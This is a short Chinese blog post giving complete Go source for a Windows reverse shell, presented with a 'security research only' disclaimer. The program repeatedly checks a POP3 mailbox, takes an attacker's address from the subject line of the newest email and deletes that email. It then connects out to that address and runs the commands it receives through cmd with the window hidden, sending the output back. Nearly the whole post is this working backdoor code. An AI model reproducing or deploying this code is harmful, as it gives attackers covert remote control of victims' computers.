golang写的反弹shell(自作孽不可活,切记,切记!)

仅作安全研究

package main
import (
    "os/exec"
    "go-pop3"
    "log"
    "strings"
    "net"
    // "fmt"
    "syscall"
    "bufio"
    "time"
)

//反弹shell函数
func reverseshell(addr string){

    if c,_:=net.Dial("tcp", addr); c != nil {
        for{
            status, _ := bufio.NewReader(c).ReadString('\n');
            //显示输入命令
            // fmt.Println(status)
            //输入exit命令退出
            if status == "exit\n" {
                break
            }
            //输入Ctrl+C时字符为空退出
            if status == "" {
                break
            }
            //执行命令返回结果
            cmd := exec.Command("cmd", "/C", status)
            cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
            out, _ := cmd.Output();
            c.Write([]byte(out))
        }
    }
}

//获取Email中的地址并调用反弹shell函数
func Get_Address_to_Rverse_shell(username string, password string){

    client, err := pop3.Dial("pop.sina.com:110")

    if err != nil {
        log.Fatalf("Error: %v\n", err)
    }

    defer func() {
        client.Quit()
        client.Close()
    }()

    if err = client.User(username); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Pass(password); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    var count int
    var size uint64

    if count, size, err = client.Stat(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    log.Printf("Count: %d, Size: %d\n", count, size)

    var content string

    if content, err = client.Retr(count); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Dele(count); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Noop(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Rset(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    //处理邮件object,获取地址
    list := strings.Split(content, "\r\n")
    for i := 0; i < len(list); i++ {
        line := list[i]
        if strings.Contains(line, "Subject:"){
            addrlist := strings.Split(line, ":")
            if len(addrlist) == 3 {
                temp_addr := addrlist[1] + ":" + addrlist[2]
                ADDR := strings.Replace(temp_addr, " ", "", -1)
                reverseshell(ADDR)
                // go reverseshell(ADDR)
            }
        }
    }
}


func main(){
    
    username := "xxx"
    password := "xxx"
    for{
        Get_Address_to_Rverse_shell(username, password)
        time.Sleep(10 * time.Second)
    }

}



你可能感兴趣的:(编程人生,黑客帝国)